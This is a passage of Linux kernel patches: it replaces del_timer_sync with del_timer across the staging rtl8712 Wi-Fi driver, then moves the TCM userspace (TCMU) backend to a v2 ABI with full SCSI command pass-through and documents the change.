del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } pLed->bLedBlinkInProgress = true; @@ -998,19 +998,19 @@ static void SwLedControlMode1(struct _adapter *padapter, case LED_CTL_START_WPS_BOTTON: if (pLed->bLedWPSBlinkInProgress == false) { if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + 
del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } pLed->bLedWPSBlinkInProgress = true; @@ -1025,23 +1025,23 @@ static void SwLedControlMode1(struct _adapter *padapter, break; case LED_CTL_STOP_WPS: if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); else pLed->bLedWPSBlinkInProgress = true; pLed->CurrLedState = LED_BLINK_WPS_STOP; @@ -1057,7 +1057,7 @@ static void SwLedControlMode1(struct _adapter *padapter, break; case LED_CTL_STOP_WPS_FAIL: if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -1073,23 +1073,23 @@ static void SwLedControlMode1(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState = LED_OFF; if (pLed->bLedNoLinkBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } mod_timer(&pLed->BlinkTimer, @@ -1116,7 +1116,7 @@ static void SwLedControlMode2(struct _adapter *padapter, return; if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedScanBlinkInProgress = true; @@ -1154,11 +1154,11 @@ static void SwLedControlMode2(struct _adapter *padapter, pLed->CurrLedState = LED_ON; pLed->BlinkingLedState = LED_ON; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } @@ -1170,11 +1170,11 @@ static void SwLedControlMode2(struct _adapter *padapter, case LED_CTL_START_WPS_BOTTON: if (pLed->bLedWPSBlinkInProgress == false) { if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } pLed->bLedWPSBlinkInProgress = true; @@ -1214,15 +1214,15 @@ static void SwLedControlMode2(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState 
= LED_OFF; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } mod_timer(&pLed->BlinkTimer, @@ -1248,7 +1248,7 @@ static void SwLedControlMode3(struct _adapter *padapter, if (IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedScanBlinkInProgress = true; @@ -1286,11 +1286,11 @@ static void SwLedControlMode3(struct _adapter *padapter, pLed->CurrLedState = LED_ON; pLed->BlinkingLedState = LED_ON; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } mod_timer(&pLed->BlinkTimer, @@ -1300,11 +1300,11 @@ static void SwLedControlMode3(struct _adapter *padapter, case LED_CTL_START_WPS_BOTTON: if (pLed->bLedWPSBlinkInProgress == false) { if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } pLed->bLedWPSBlinkInProgress = true; @@ -1319,7 +1319,7 @@ static void SwLedControlMode3(struct _adapter *padapter, break; case LED_CTL_STOP_WPS: if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&(pLed->BlinkTimer)); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } else pLed->bLedWPSBlinkInProgress = true; @@ -1336,7 +1336,7 @@ static void SwLedControlMode3(struct _adapter *padapter, break; case LED_CTL_STOP_WPS_FAIL: if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->CurrLedState = LED_OFF; @@ -1357,15 +1357,15 @@ static void SwLedControlMode3(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState = LED_OFF; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } mod_timer(&pLed->BlinkTimer, @@ -1388,7 +1388,7 @@ static void SwLedControlMode4(struct _adapter *padapter, case LED_CTL_START_TO_LINK: if (pLed1->bLedWPSBlinkInProgress) { pLed1->bLedWPSBlinkInProgress = false; - del_timer_sync(&pLed1->BlinkTimer); + del_timer(&pLed1->BlinkTimer); pLed1->BlinkingLedState = LED_OFF; pLed1->CurrLedState = LED_OFF; if (pLed1->bLedOn) @@ -1400,11 +1400,11 @@ static void SwLedControlMode4(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if 
(pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } pLed->bLedStartToLinkBlinkInProgress = true; @@ -1426,7 +1426,7 @@ static void SwLedControlMode4(struct _adapter *padapter, if (LedAction == LED_CTL_LINK) { if (pLed1->bLedWPSBlinkInProgress) { pLed1->bLedWPSBlinkInProgress = false; - del_timer_sync(&pLed1->BlinkTimer); + del_timer(&pLed1->BlinkTimer); pLed1->BlinkingLedState = LED_OFF; pLed1->CurrLedState = LED_OFF; if (pLed1->bLedOn) @@ -1439,7 +1439,7 @@ static void SwLedControlMode4(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -1460,11 +1460,11 @@ static void SwLedControlMode4(struct _adapter *padapter, if (IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedScanBlinkInProgress = true; @@ -1485,7 +1485,7 @@ static void SwLedControlMode4(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } pLed->bLedBlinkInProgress = true; @@ -1503,7 +1503,7 @@ static void SwLedControlMode4(struct _adapter *padapter, case LED_CTL_START_WPS_BOTTON: if (pLed1->bLedWPSBlinkInProgress) { pLed1->bLedWPSBlinkInProgress = false; - del_timer_sync(&(pLed1->BlinkTimer)); + del_timer(&pLed1->BlinkTimer); pLed1->BlinkingLedState = LED_OFF; pLed1->CurrLedState = LED_OFF; if (pLed1->bLedOn) @@ -1512,15 +1512,15 @@ static void SwLedControlMode4(struct _adapter *padapter, } if (pLed->bLedWPSBlinkInProgress == false) { if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } pLed->bLedWPSBlinkInProgress = true; @@ -1538,7 +1538,7 @@ static void SwLedControlMode4(struct _adapter *padapter, break; case LED_CTL_STOP_WPS: /*WPS connect success*/ if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -1552,7 +1552,7 @@ static void SwLedControlMode4(struct _adapter *padapter, break; case LED_CTL_STOP_WPS_FAIL: /*WPS authentication fail*/ if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -1565,7 +1565,7 @@ static void SwLedControlMode4(struct _adapter *padapter, msecs_to_jiffies(LED_BLINK_NO_LINK_INTERVAL_ALPHA)); /*LED1 settings*/ if (pLed1->bLedWPSBlinkInProgress) - del_timer_sync(&pLed1->BlinkTimer); + del_timer(&pLed1->BlinkTimer); else pLed1->bLedWPSBlinkInProgress = true; pLed1->CurrLedState = 
LED_BLINK_WPS_STOP; @@ -1578,7 +1578,7 @@ static void SwLedControlMode4(struct _adapter *padapter, break; case LED_CTL_STOP_WPS_FAIL_OVERLAP: /*WPS session overlap*/ if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -1591,7 +1591,7 @@ static void SwLedControlMode4(struct _adapter *padapter, msecs_to_jiffies(LED_BLINK_NO_LINK_INTERVAL_ALPHA)); /*LED1 settings*/ if (pLed1->bLedWPSBlinkInProgress) - del_timer_sync(&pLed1->BlinkTimer); + del_timer(&pLed1->BlinkTimer); else pLed1->bLedWPSBlinkInProgress = true; pLed1->CurrLedState = LED_BLINK_WPS_STOP_OVERLAP; @@ -1607,31 +1607,31 @@ static void SwLedControlMode4(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState = LED_OFF; if (pLed->bLedNoLinkBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } if (pLed->bLedScanBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedScanBlinkInProgress = false; } if (pLed->bLedStartToLinkBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedStartToLinkBlinkInProgress = false; } if (pLed1->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed1->BlinkTimer); + del_timer(&pLed1->BlinkTimer); pLed1->bLedWPSBlinkInProgress = false; } pLed1->BlinkingLedState = LED_UNKNOWN; @@ -1671,7 +1671,7 @@ static void SwLedControlMode5(struct _adapter *padapter, ; /* dummy branch */ else if (pLed->bLedScanBlinkInProgress == false) { if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedScanBlinkInProgress = true; @@ -1705,7 +1705,7 @@ static void SwLedControlMode5(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState = LED_OFF; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } SwLedOff(padapter, pLed); @@ -1756,7 +1756,7 @@ static void SwLedControlMode6(struct _adapter *padapter, case LED_CTL_START_WPS_BOTTON: if (pLed->bLedWPSBlinkInProgress == false) { if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedWPSBlinkInProgress = true; @@ -1772,7 +1772,7 @@ static void SwLedControlMode6(struct _adapter *padapter, case LED_CTL_STOP_WPS_FAIL: case LED_CTL_STOP_WPS: if (pLed->bLedWPSBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } pLed->CurrLedState = LED_ON; @@ -1784,11 +1784,11 @@ static void SwLedControlMode6(struct _adapter *padapter, pLed->CurrLedState = LED_OFF; pLed->BlinkingLedState = LED_OFF; if (pLed->bLedBlinkInProgress) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } if (pLed->bLedWPSBlinkInProgress) { - 
del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedWPSBlinkInProgress = false; } SwLedOff(padapter, pLed); diff --git a/drivers/staging/rtl8712/rtl871x_cmd.c b/drivers/staging/rtl8712/rtl871x_cmd.c index 1a1c38f885d6..e35854d28f90 100644 --- a/drivers/staging/rtl8712/rtl871x_cmd.c +++ b/drivers/staging/rtl8712/rtl871x_cmd.c @@ -910,7 +910,7 @@ void r8712_createbss_cmd_callback(struct _adapter *padapter, if (pcmd->res != H2C_SUCCESS) mod_timer(&pmlmepriv->assoc_timer, jiffies + msecs_to_jiffies(1)); - del_timer_sync(&pmlmepriv->assoc_timer); + del_timer(&pmlmepriv->assoc_timer); #ifdef __BIG_ENDIAN /* endian_convert */ pnetwork->Length = le32_to_cpu(pnetwork->Length); diff --git a/drivers/staging/rtl8712/rtl871x_mlme.c b/drivers/staging/rtl8712/rtl871x_mlme.c index fb2b195b90af..c044b0e55ba9 100644 --- a/drivers/staging/rtl8712/rtl871x_mlme.c +++ b/drivers/staging/rtl8712/rtl871x_mlme.c @@ -582,7 +582,7 @@ void r8712_surveydone_event_callback(struct _adapter *adapter, u8 *pbuf) spin_lock_irqsave(&pmlmepriv->lock, irqL); if (check_fwstate(pmlmepriv, _FW_UNDER_SURVEY) == true) { - del_timer_sync(&pmlmepriv->scan_to_timer); + del_timer(&pmlmepriv->scan_to_timer); _clr_fwstate_(pmlmepriv, _FW_UNDER_SURVEY); } @@ -696,7 +696,7 @@ void r8712_ind_disconnect(struct _adapter *padapter) } if (padapter->pwrctrlpriv.pwr_mode != padapter->registrypriv.power_mgnt) { - del_timer_sync(&pmlmepriv->dhcp_timer); + del_timer(&pmlmepriv->dhcp_timer); r8712_set_ps_mode(padapter, padapter->registrypriv.power_mgnt, padapter->registrypriv.smart_ps); } @@ -910,7 +910,7 @@ void r8712_joinbss_event_callback(struct _adapter *adapter, u8 *pbuf) if (check_fwstate(pmlmepriv, WIFI_STATION_STATE) == true) r8712_indicate_connect(adapter); - del_timer_sync(&pmlmepriv->assoc_timer); + del_timer(&pmlmepriv->assoc_timer); } else goto ignore_joinbss_callback; } else { diff --git a/drivers/staging/rtl8712/rtl871x_pwrctrl.c b/drivers/staging/rtl8712/rtl871x_pwrctrl.c index aaa584435c87..9bc04f474d18 100644 --- a/drivers/staging/rtl8712/rtl871x_pwrctrl.c +++ b/drivers/staging/rtl8712/rtl871x_pwrctrl.c @@ -103,7 +103,7 @@ void r8712_cpwm_int_hdl(struct _adapter *padapter, if (pwrpriv->cpwm_tog == ((preportpwrstate->state) & 0x80)) return; - del_timer_sync(&padapter->pwrctrlpriv.rpwm_check_timer); + del_timer(&padapter->pwrctrlpriv.rpwm_check_timer); _enter_pwrlock(&pwrpriv->lock); pwrpriv->cpwm = (preportpwrstate->state) & 0xf; if (pwrpriv->cpwm >= PS_STATE_S2) { diff --git a/drivers/staging/rtl8712/rtl871x_sta_mgt.c b/drivers/staging/rtl8712/rtl871x_sta_mgt.c index 7bb96c47f188..a9b93d0f6f56 100644 --- a/drivers/staging/rtl8712/rtl871x_sta_mgt.c +++ b/drivers/staging/rtl8712/rtl871x_sta_mgt.c @@ -198,7 +198,7 @@ void r8712_free_stainfo(struct _adapter *padapter, struct sta_info *psta) * cancel reordering_ctrl_timer */ for (i = 0; i < 16; i++) { preorder_ctrl = &psta->recvreorder_ctrl[i]; - del_timer_sync(&preorder_ctrl->reordering_ctrl_timer); + del_timer(&preorder_ctrl->reordering_ctrl_timer); } spin_lock(&(pfree_sta_queue->lock)); /* insert into free_sta_queue; 20061114 */ From cf87edc6022d1fe7efa6b8ce1a99f2ef6a1b27f9 Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Tue, 19 May 2015 14:44:38 -0700 Subject: [PATCH 505/872] target/user: Update example code for new ABI requirements We now require that the userspace handler set a bit if the command is not handled. Update calls to tcmu_hdr_get_op for v2. 
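Condensed, the per-entry handling in the updated example below becomes:

  #include <linux/target_core_user.h>

  /* condensed from the tcmu-design.txt hunk below: per-entry handling */
  static void handle_ring_entry(struct tcmu_cmd_entry *ent)
  {
          if (tcmu_hdr_get_op(ent->hdr.len_op) == TCMU_OP_CMD) {
                  /* decode ent->req, do the I/O, then set ent->rsp.scsi_status */
          } else if (tcmu_hdr_get_op(ent->hdr.len_op) != TCMU_OP_PAD) {
                  /* v2 ABI: flag opcodes we do not understand */
                  ent->hdr.uflags |= TCMU_UFLAG_UNKNOWN_OP;
          }
          /* PAD entries need nothing beyond the cmd_tail update */
  }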
Signed-off-by: Andy Grover Reviewed-by: Ilias Tsitsimpis Signed-off-by: Nicholas Bellinger --- Documentation/target/tcmu-design.txt | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/Documentation/target/tcmu-design.txt b/Documentation/target/tcmu-design.txt index c80bf1ed8981..b495108c433c 100644 --- a/Documentation/target/tcmu-design.txt +++ b/Documentation/target/tcmu-design.txt @@ -324,7 +324,7 @@ int handle_device_events(int fd, void *map) /* Process events from cmd ring until we catch up with cmd_head */ while (ent != (void *)mb + mb->cmdr_off + mb->cmd_head) { - if (tcmu_hdr_get_op(&ent->hdr) == TCMU_OP_CMD) { + if (tcmu_hdr_get_op(ent->hdr.len_op) == TCMU_OP_CMD) { uint8_t *cdb = (void *)mb + ent->req.cdb_off; bool success = true; @@ -339,8 +339,12 @@ int handle_device_events(int fd, void *map) ent->rsp.scsi_status = SCSI_CHECK_CONDITION; } } + else if (tcmu_hdr_get_op(ent->hdr.len_op) != TCMU_OP_PAD) { + /* Tell the kernel we didn't handle unknown opcodes */ + ent->hdr.uflags |= TCMU_UFLAG_UNKNOWN_OP; + } else { - /* Do nothing for PAD entries */ + /* Do nothing for PAD entries except update cmd_tail */ } /* update cmd_tail */ From 9c1cd1b68cd15c81d12a0cf2402129475882b620 Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Tue, 19 May 2015 14:44:39 -0700 Subject: [PATCH 506/872] target/user: Only support full command pass-through After much discussion, give up on only passing a subset of SCSI commands to userspace and pass them all. Based on what pscsi is doing, make sure to set SCF_SCSI_DATA_CDB for I/O ops, and define attributes identical to pscsi. Make hw_block_size configurable via dev param. Remove mention of command filtering from tcmu-design.txt. Signed-off-by: Andy Grover Reviewed-by: Ilias Tsitsimpis Signed-off-by: Nicholas Bellinger --- Documentation/target/tcmu-design.txt | 21 +---- drivers/target/target_core_user.c | 124 ++++++++++++++++----------- 2 files changed, 75 insertions(+), 70 deletions(-) diff --git a/Documentation/target/tcmu-design.txt b/Documentation/target/tcmu-design.txt index b495108c433c..263b907517ac 100644 --- a/Documentation/target/tcmu-design.txt +++ b/Documentation/target/tcmu-design.txt @@ -15,8 +15,7 @@ Contents: a) Discovering and configuring TCMU uio devices b) Waiting for events on the device(s) c) Managing the command ring -3) Command filtering -4) A final note +3) A final note TCM Userspace Design @@ -364,24 +363,6 @@ int handle_device_events(int fd, void *map) } -Command filtering ------------------ - -Initial TCMU support is for a filtered commandset. Only IO-related -commands are presented to userspace, and the rest are handled by LIO's -in-kernel command emulation. 
The commands presented are all versions -of: - -READ -WRITE -WRITE_VERIFY -XDWRITEREAD -WRITE_SAME -COMPARE_AND_WRITE -SYNCHRONIZE_CACHE -UNMAP - - A final note ------------ diff --git a/drivers/target/target_core_user.c b/drivers/target/target_core_user.c index 0e0feeaec39c..90e084ea7b92 100644 --- a/drivers/target/target_core_user.c +++ b/drivers/target/target_core_user.c @@ -938,12 +938,13 @@ static void tcmu_free_device(struct se_device *dev) } enum { - Opt_dev_config, Opt_dev_size, Opt_err, + Opt_dev_config, Opt_dev_size, Opt_hw_block_size, Opt_err, }; static match_table_t tokens = { {Opt_dev_config, "dev_config=%s"}, {Opt_dev_size, "dev_size=%u"}, + {Opt_hw_block_size, "hw_block_size=%u"}, {Opt_err, NULL} }; @@ -954,6 +955,7 @@ static ssize_t tcmu_set_configfs_dev_params(struct se_device *dev, char *orig, *ptr, *opts, *arg_p; substring_t args[MAX_OPT_ARGS]; int ret = 0, token; + unsigned long tmp_ul; opts = kstrdup(page, GFP_KERNEL); if (!opts) @@ -986,6 +988,24 @@ static ssize_t tcmu_set_configfs_dev_params(struct se_device *dev, if (ret < 0) pr_err("kstrtoul() failed for dev_size=\n"); break; + case Opt_hw_block_size: + arg_p = match_strdup(&args[0]); + if (!arg_p) { + ret = -ENOMEM; + break; + } + ret = kstrtoul(arg_p, 0, &tmp_ul); + kfree(arg_p); + if (ret < 0) { + pr_err("kstrtoul() failed for hw_block_size=\n"); + break; + } + if (!tmp_ul) { + pr_err("hw_block_size must be nonzero\n"); + break; + } + dev->dev_attrib.hw_block_size = tmp_ul; + break; default: break; } @@ -1016,12 +1036,9 @@ static sector_t tcmu_get_blocks(struct se_device *dev) } static sense_reason_t -tcmu_execute_rw(struct se_cmd *se_cmd, struct scatterlist *sgl, u32 sgl_nents, - enum dma_data_direction data_direction) +tcmu_pass_op(struct se_cmd *se_cmd) { - int ret; - - ret = tcmu_queue_cmd(se_cmd); + int ret = tcmu_queue_cmd(se_cmd); if (ret != 0) return TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE; @@ -1030,62 +1047,69 @@ tcmu_execute_rw(struct se_cmd *se_cmd, struct scatterlist *sgl, u32 sgl_nents, } static sense_reason_t -tcmu_pass_op(struct se_cmd *se_cmd) +tcmu_parse_cdb(struct se_cmd *cmd) { - int ret = tcmu_queue_cmd(se_cmd); + unsigned char *cdb = cmd->t_task_cdb; - if (ret != 0) - return TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE; - else + /* + * For REPORT LUNS we always need to emulate the response, for everything + * else, pass it up. 
+ */ + if (cdb[0] == REPORT_LUNS) { + cmd->execute_cmd = spc_emulate_report_luns; return TCM_NO_SENSE; -} + } -static struct sbc_ops tcmu_sbc_ops = { - .execute_rw = tcmu_execute_rw, - .execute_sync_cache = tcmu_pass_op, - .execute_write_same = tcmu_pass_op, - .execute_write_same_unmap = tcmu_pass_op, - .execute_unmap = tcmu_pass_op, -}; + /* Set DATA_CDB flag for ops that should have it */ + switch (cdb[0]) { + case READ_6: + case READ_10: + case READ_12: + case READ_16: + case WRITE_6: + case WRITE_10: + case WRITE_12: + case WRITE_16: + case WRITE_VERIFY: + case WRITE_VERIFY_12: + case 0x8e: /* WRITE_VERIFY_16 */ + case COMPARE_AND_WRITE: + case XDWRITEREAD_10: + cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; + break; + case VARIABLE_LENGTH_CMD: + switch (get_unaligned_be16(&cdb[8])) { + case READ_32: + case WRITE_32: + case 0x0c: /* WRITE_VERIFY_32 */ + case XDWRITEREAD_32: + cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; + break; + } + } -static sense_reason_t -tcmu_parse_cdb(struct se_cmd *cmd) -{ - return sbc_parse_cdb(cmd, &tcmu_sbc_ops); + cmd->execute_cmd = tcmu_pass_op; + + return TCM_NO_SENSE; } -DEF_TB_DEFAULT_ATTRIBS(tcmu); +DEF_TB_DEV_ATTRIB_RO(tcmu, hw_pi_prot_type); +TB_DEV_ATTR_RO(tcmu, hw_pi_prot_type); + +DEF_TB_DEV_ATTRIB_RO(tcmu, hw_block_size); +TB_DEV_ATTR_RO(tcmu, hw_block_size); + +DEF_TB_DEV_ATTRIB_RO(tcmu, hw_max_sectors); +TB_DEV_ATTR_RO(tcmu, hw_max_sectors); + +DEF_TB_DEV_ATTRIB_RO(tcmu, hw_queue_depth); +TB_DEV_ATTR_RO(tcmu, hw_queue_depth); static struct configfs_attribute *tcmu_backend_dev_attrs[] = { - &tcmu_dev_attrib_emulate_model_alias.attr, - &tcmu_dev_attrib_emulate_dpo.attr, - &tcmu_dev_attrib_emulate_fua_write.attr, - &tcmu_dev_attrib_emulate_fua_read.attr, - &tcmu_dev_attrib_emulate_write_cache.attr, - &tcmu_dev_attrib_emulate_ua_intlck_ctrl.attr, - &tcmu_dev_attrib_emulate_tas.attr, - &tcmu_dev_attrib_emulate_tpu.attr, - &tcmu_dev_attrib_emulate_tpws.attr, - &tcmu_dev_attrib_emulate_caw.attr, - &tcmu_dev_attrib_emulate_3pc.attr, - &tcmu_dev_attrib_pi_prot_type.attr, &tcmu_dev_attrib_hw_pi_prot_type.attr, - &tcmu_dev_attrib_pi_prot_format.attr, - &tcmu_dev_attrib_enforce_pr_isids.attr, - &tcmu_dev_attrib_is_nonrot.attr, - &tcmu_dev_attrib_emulate_rest_reord.attr, - &tcmu_dev_attrib_force_pr_aptpl.attr, &tcmu_dev_attrib_hw_block_size.attr, - &tcmu_dev_attrib_block_size.attr, &tcmu_dev_attrib_hw_max_sectors.attr, - &tcmu_dev_attrib_optimal_sectors.attr, &tcmu_dev_attrib_hw_queue_depth.attr, - &tcmu_dev_attrib_queue_depth.attr, - &tcmu_dev_attrib_max_unmap_lba_count.attr, - 